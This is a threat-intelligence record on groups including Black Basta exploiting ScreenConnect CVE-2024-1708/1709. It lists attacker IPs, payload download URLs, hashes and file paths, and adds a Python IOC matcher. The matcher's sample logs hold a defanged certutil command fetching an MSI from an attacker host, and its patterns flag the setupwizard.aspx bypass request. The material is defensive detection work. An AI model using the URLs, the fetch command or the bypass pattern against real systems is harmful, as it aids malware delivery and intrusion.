Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Common Information
Type Value
UUID 161f910e-475f-4558-9a41-65f087ee38a6
Fingerprint a4762cd0e33f8f87
Analysis status IN_PROGRESS
Considered CTI value 2
Text language
Published Feb. 27, 2024, midnight
Added to db Oct. 15, 2024, 3:40 p.m.
Last updated Nov. 17, 2024, 6:56 p.m.
Headline Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Title Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Detected Hints/Tags/Attributes 103/3/72
Source URLs
Redirection Url
https://www.trendmicro.com/en_ph/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_hk/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_ca/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_th/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_nl/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_ae/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_se/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_be/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_no/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_id/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_dk/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_ie/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_gb/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
https://www.trendmicro.com/en_fi/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
Attributes
Type            #Events  Value
CVE                  25  cve-2024-1708
CVE                  29  cve-2024-1709
CVE                 140  cve-2023-27350
Domain                5  wipresolutions.com
Domain                2  dns.artstrailreviews.com
Domain               45  paste.ee
Domain                2  input-beats.gl.at.ply.gg
Domain               71  transfer.sh
Domain                2  instance-tj4lui-relay.screenconnect.com
Domain              272  outlook.com
Email                 2  integratorlogin=pichet1208@outlook.com
File                 11  web.dll
File                  6  setupwizard.aspx
File                  2  screenconnect.zip
File                  3  screenconnect.core
File                256  net.exe
File                 49  nltest.exe
File               1208  powershell.exe
File                  2  diablo.log
File                  2  c:\users\public\diablo.log
File               1018  rundll32.exe
File                  2  09d.log
File                  2  c:\users\public\09d.log
File                  2  10443.exe
File                  2  c:\users\public\10443.exe
File               1122  svchost.exe
File                226  certutil.exe
File                  3  msappdata.msi
File                  3  c:\mpyutd.msi
File                409  c:\windows\system32\cmd.exe
File                  2  c:\mpyuts.msi
File                  2  read_instructions_to_decrypt.txt
File                  2  chromeset.exe
File                  2  c:\chromeset.exe
File                 18  c:\windows\system32\net.exe
File                  5  c:\windows\system32\bitsadmin.exe
File                  2  c:\programdata\sc.exe
File                 27  c:\windows\system32\msiexec.exe
File                 20  setup.msi
sha256                1  11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771
sha256                2  cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55
sha256                2  fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e
sha256                2  e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
sha256                3  8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
sha256                2  3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
sha256                2  47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
sha256                2  86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
IPv4                  3  159.65.130.146
IPv4                  3  23.26.137.225
MITRE ATT&CK         43  T1078.003 (Valid Accounts: Local Accounts)
MITRE ATT&CK        124  T1482 (Domain Trust Discovery)
MITRE ATT&CK         41  T1078.001 (Valid Accounts: Default Accounts)
MITRE ATT&CK        179  T1087 (Account Discovery)
MITRE ATT&CK        460  T1059.001 (Command and Scripting Interpreter: PowerShell)
MITRE ATT&CK        235  T1562 (Impair Defenses)
MITRE ATT&CK        492  T1105 (Ingress Tool Transfer)
MITRE ATT&CK         22  T1087.003 (Account Discovery: Email Account)
MITRE ATT&CK         72  T1087.001 (Account Discovery: Local Account)
MITRE ATT&CK        141  T1219 (Remote Access Software)
MITRE ATT&CK        542  T1190 (Exploit Public-Facing Application)
MITRE ATT&CK        422  T1041 (Exfiltration Over C2 Channel)
MITRE ATT&CK        472  T1486 (Data Encrypted for Impact)
Url                   2  http://207.246.74.189:804/download/diablo.log
Url                   2  http://51.195.192.120:804/download/09d.log
Url                   2  http://198.244.169.213:8045/download/10443.exe
Url                   2  http://159.65.130.146:4444/a
Url                   2  http://159.65.130.146:4444/svchost.exe
Url                   3  http://23.26.137.225:8084/msappdata.msi
Url                   2  http://23.26.137.225:8091/chromeset.exe
Url                   2  https://paste.ee/r/mzeoz/0
Url                   2  https://paste.ee/r/pxlkv/0
Url                   2  https://transfer.sh/get/hcrhqun0yc/temp3.exe
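Added example (Python), not code from the page or from Trend Micro: a small matcher that applies the record's indicators to log lines. It copies the hash, IP, domain and file-path values from the table above, refangs defanged URLs before matching, and flags the two behaviours the record's technique list points at: a listed downloader (certutil, bitsadmin, PowerShell) contacting a listed host (T1105), and a request to setupwizard.aspx with an extra path segment, which is the request shape public advisories give for the CVE-2024-1709 authentication bypass (an assumption on top of the page, which only lists the file name). The IPs 207.246.74.189, 51.195.192.120 and 198.244.169.213 are taken from the record's download URLs; every log line in SAMPLE_LOGS is constructed for illustration and is not real telemetry.

```python
"""IOC matcher for the ScreenConnect / Black Basta record above.

Added example; not code from the page or from Trend Micro. Indicator values
are copied from the record; SAMPLE_LOGS is constructed, not real telemetry.
"""
import re

IOC_HASHES = {
    "11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771",
    "cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55",
    "fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e",
    "e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92",
    "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600",
    "3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623",
    "47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27",
    "86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132",
}
# The two IPv4 rows plus the hosts of the record's IP-based download URLs.
IOC_IPS = {"159.65.130.146", "23.26.137.225",
           "207.246.74.189", "51.195.192.120", "198.244.169.213"}
# outlook.com is left out: it is only the mail domain of the integrator login
# and would fire on every line that mentions Outlook.
IOC_DOMAINS = {"wipresolutions.com", "dns.artstrailreviews.com", "paste.ee",
               "input-beats.gl.at.ply.gg", "transfer.sh",
               "instance-tj4lui-relay.screenconnect.com"}
# Full paths only; bare names such as svchost.exe or net.exe are too noisy.
IOC_PATHS = {r"c:\users\public\diablo.log", r"c:\users\public\09d.log",
             r"c:\users\public\10443.exe", r"c:\mpyutd.msi", r"c:\mpyuts.msi",
             r"c:\chromeset.exe", r"c:\programdata\sc.exe"}
# LOLBins listed in the record that were used to pull payloads (T1105).
DOWNLOADERS = ("certutil.exe", "bitsadmin.exe", "powershell.exe")


def refang(s: str) -> str:
    """Undo common defanging (hxxp, [.], (.), [:]) so raw IOC values match."""
    s = re.sub(r"(?i)hxxp", "http", s)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def match_line(raw: str) -> set:
    """Return the set of tags one log line triggers (empty set = no hit)."""
    low = refang(raw).lower()
    tags = set()
    tags.update("hash:" + h for h in re.findall(r"\b[0-9a-f]{64}\b", low)
                if h in IOC_HASHES)
    ips = {ip for ip in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", low)
           if ip in IOC_IPS}
    tags.update("ip:" + ip for ip in ips)
    # Hostname tokens; a subdomain of a listed domain also counts.
    hosts = {tok for tok in re.findall(r"[a-z0-9][a-z0-9.-]*\.[a-z]{2,}", low)
             for d in IOC_DOMAINS if tok == d or tok.endswith("." + d)}
    tags.update("domain:" + h for h in hosts)
    tags.update("path:" + p for p in IOC_PATHS if p in low)
    # A listed downloader reaching a listed host: the record's T1105 pattern.
    if (ips or hosts) and any(d in low for d in DOWNLOADERS):
        tags.add("ingress_tool_transfer")
    # setupwizard.aspx followed by an extra path segment: the request shape
    # public advisories describe for the CVE-2024-1709 bypass (assumption; the
    # record itself only lists the file name).
    if re.search(r"setupwizard\.aspx/\S", low):
        tags.add("screenconnect_setupwizard_bypass")
    return tags


def scan(lines):
    """Return [(line_index, sorted_tags)] for every line that matched."""
    hits = []
    for i, line in enumerate(lines):
        tags = match_line(line)
        if tags:
            hits.append((i, sorted(tags)))
    return hits


SAMPLE_LOGS = [  # constructed lines in IIS / Sysmon / proxy style, not real data
    r"2024-02-21 10:14:02 GET /SetupWizard.aspx/anything - 443 - 203.0.113.7",
    r'ProcessCreate Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f hxxp://23[.]26[.]137[.]225:8084/msappdata.msi C:\mpyutd.msi"',
    r'ProcessCreate Image=C:\Windows\System32\svchost.exe CommandLine="svchost.exe -k netsvcs"',
    r"FileCreate TargetFilename=C:\Users\Public\10443.exe Hash=SHA256:8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600",
    r"proxy 10.0.0.5 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(tags)}")
```

Bare process names (svchost.exe, rundll32.exe, powershell.exe) are deliberately not matched on their own, since they are ordinary Windows binaries; paste.ee and transfer.sh are shared services and will also produce hits on legitimate use, so treat domain hits as triage leads rather than verdicts. Feed real telemetry to scan() one record per line after normalising it to text.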